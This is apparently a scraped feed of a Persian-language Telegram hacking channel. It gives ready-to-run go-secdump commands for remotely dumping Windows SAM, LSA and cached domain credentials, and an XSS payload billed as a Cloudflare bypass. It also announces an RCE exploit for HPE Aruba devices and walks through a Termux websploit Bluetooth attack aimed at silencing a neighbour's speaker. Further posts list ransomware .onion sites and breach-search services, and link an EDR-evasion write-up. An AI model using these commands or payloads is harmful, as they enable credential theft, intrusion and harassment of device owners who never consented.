P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
🔄🖼️ go-secdump v0.3.0

ابزاری برای کپی از راه دور 🏠 اسرار ویندوز (SAM، LSA) بدون ذخیره در دیسک

پشتیبانی برای احراز هویت Kerberos اضافه شده است

username + password
username + NT Hash
username + AES Key
cached credentials on Linux (TGS or TGT in .ccache file)


مثال:

./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2

Relay:

./go-secdump --host 192.168.0.100 -n --relay

گزینه های اصلی:

--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>


▶️ https://github.com/jfjallid/go-secdump
▶️ https://github.com/jfjallid/go-secdump/releases

@PfkSecurity
چگونه ناشناس شویم

از یک سیستم عامل متمرکز بر حریم خصوصی مانند Tails استفاده کنید که تمام ترافیک اینترنت را از طریق شبکه Tor هدایت می کند.

از VPN یا TOR برای پنهان کردن آدرس IP و رمزگذاری ترافیک اینترنت خود استفاده کنید.

به جای نام واقعی خود از نام مستعار استفاده کنید.

از استفاده آنلاین از اطلاعات شخصی مانند آدرس منزل یا تاریخ تولد خودداری کنید.

از یک مرورگر وب امن مانند Tor، Brave، StartPage استفاده کنید که از ناشناس بودن شما محافظت می کند و webrtc را غیرفعال می کند.

از استفاده از آدرس ایمیل شخصی خود برای فعالیت های آنلاین خودداری کنید. از ایمیل جعلی برای فعالیت های ناشناس استفاده کنید

از اشتراک گذاری عکس ها یا داده های موقعیت مکانی در رسانه های اجتماعی خودداری کنید.

در صورت امکان از احراز هویت دو مرحله ای برای افزودن یک لایه امنیتی اضافی به حساب های آنلاین خود استفاده کنید.

برای جلوگیری از ردیابی، کوکی ها و تاریخچه مرور خود را به طور مرتب پاک کنید.

از استفاده از نام کاربری یکسان در چندین وب سایت خودداری کنید.

نیازهای خود را کنترل کنید زیرا نیازها و احساسات شما نسبت به دختر شما را آسیب پذیر می کند 💐 ❤️

از استفاده از شماره تلفن شخصی خود برای حساب های آنلاین خودداری کنید. آنها می توانند شما را به راحتی با این ردیابی کنند، در عوض، از یک شماره تلفن مجازی استفاده کنید.

از کلاهبرداری های فیشینگ و سایر تاکتیک ها مانند هانی پات که مهاجمان می توانند برای فریب شما برای افشای اطلاعات شخصی استفاده کنند آگاه باشید.

از یک سرویس به اشتراک گذاری فایل امن مانند SpiderOak استفاده کنید که فایل های شما را رمزگذاری می کند و ذخیره سازی ایمن را ارائه می دهد.

به غریزه خود اعتماد کنید و مراقب هر کسی که اطلاعات شخصی را می‌پرسد یا مشکوک به نظر می‌رسد باشید.


@PfkSecurity
🔸️ موتورهای جستجوی DataBreach
🔹️برخی از بهترین موتورهای جستجوی نقض اطلاعات

Leak.sx - https://leak.sx/
∙ Intelligence X -
https://intelx.io/
∙ leakcheck -
https://leakcheck.io/
∙ weleakinfo -
https://weleakinfo.to/
∙ leakpeek -
https://leakpeek.com/
∙ snusbase -
https://snusbase.com/
∙ leakedsource -
https://wikileaks.org/
∙ leakedstuffs -
https://piro.eu.org/
∙ WikiLeaks -
https://cryptome.org/
∙ GlobaLeaks -
https://lnkd.in/gJqT83f
∙ Firefox Monitor -
https://lnkd.in/gW7EqXr
∙ haveibeenpwned? -
https://haveibeenpwned.com/
∙ BreachAlarm -
https://breachalarm.com/
∙ freetools -
https://piro.eu.org/

@PfkSecurity
CLOUDFLARE BYPASS

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


@PfkSecurity
از دوستان کسی اکانت vip tryhackme داره فقط برای 3 روز لازم دارم
اگر دارید ممنون میشم به اشتراک بگذارید :

@Aptmoqx0
امروز سالگرد تاج‌گذاری شاهنشاه داریوش بزرگ هخامنشی هست

خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.

@PfkSecurity
Media is too big
VIEW IN TELEGRAM
💡هک کیا: کنترل از راه دور خودروها فقط با پلاک

افشا:
https://samcurry.net/hacking-kia
@PfkSecurity
🚨گروه باج افزار جدید: نیتروژن : Nitrogen
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion

@PfkSecurity
💡بعضی از شما پرسیده‌اید که URL برای دیدن آخرین نسخه‌های درام Evil Corp و LockBit چیست:

lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion

@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
💡دیداس چگونه کار می کند اما نگاهی سه بعدی ...
@PfkSecurity
سلام به همه، امروز در مورد یکی دیگر از کاربردهای جالب termux در گوشی هوشمندتان به شما خواهم گفت.

بیایید موقعیتی را تصور کنیم که در آن همسایگان نمک نخورده و ناکافی شما تصمیم گرفتند در شب موسیقی را از بلندگو/مرکز موسیقی بلوتوث خود پخش کنند. شرایط متفاوت است، اما اگر واقعا مردم شروع به گستاخی می کنند، پس من این راه حل را پیشنهاد می کنم

Termux را باز کنید و این دستورات را بنویسید:

apt install python3


pip install scapy

git clone https://github.com/The404Hacking/websploit

cd websploit

chmod 777 * websploit.py

python3 websploit.py


بعد، هر اسکنر بلوتوثی را باز کنید و آدرس دستگاه مورد نیاز خود را با نام پیدا کنید

سپس این دستورات را وارد کنید:

use bluetooth/bluetooth_pod

set bdaddr xx:xx:xx:xx:xx:xx

در اینجا xx را با آدرس دستگاه مورد نظر جایگزین کنید.

و وارد شوید - run

اکنون می توانید با آرامش در سکوت به رختخواب بروید.

@PfkSecurity
CVE-2024-26304.py
4.3 KB
CVE-2024-26304 RCE-exploit

HPE Aruba Device

usage:
python3 CVE-2024-26304.py -u https://127.0.0.1

@PfkSecurity
شورای استانداردهای امنیتی PCI (PCI SSC) راهنمای محدوده و بخش بندی خود را برای معماری های شبکه مدرن به روز کرده است.💪

با توجه به اینکه نسخه قبلی در سال 2017 منتشر شد (در صورت استفاده از حافظه) یک به روز رسانی بسیار خوب و مفید است. در طول این مدت، فناوری‌ها و شیوه‌هایی مانند میکروسرویس‌ها، چند ابری، میکروسگمنتیشن و معماری اعتماد صفر گسترده شده‌اند، که البته مستلزم نیاز به توسعه توصیه‌هایی برای طراحی و پیاده‌سازی ایمن، از جمله. و در زیرساخت های تحت پوشش الزامات PCI DSS💯

#pci #network #architecture
@PfkSecurity
https://github.com/MythicAgents/sliver/blob/main/blog/blog.md

شما می توانید از این فرآیند چیزهای زیادی بیاموزید، به عنوان مثال، از edr اجتناب کنید و سرورهای تیم را پیوند دهید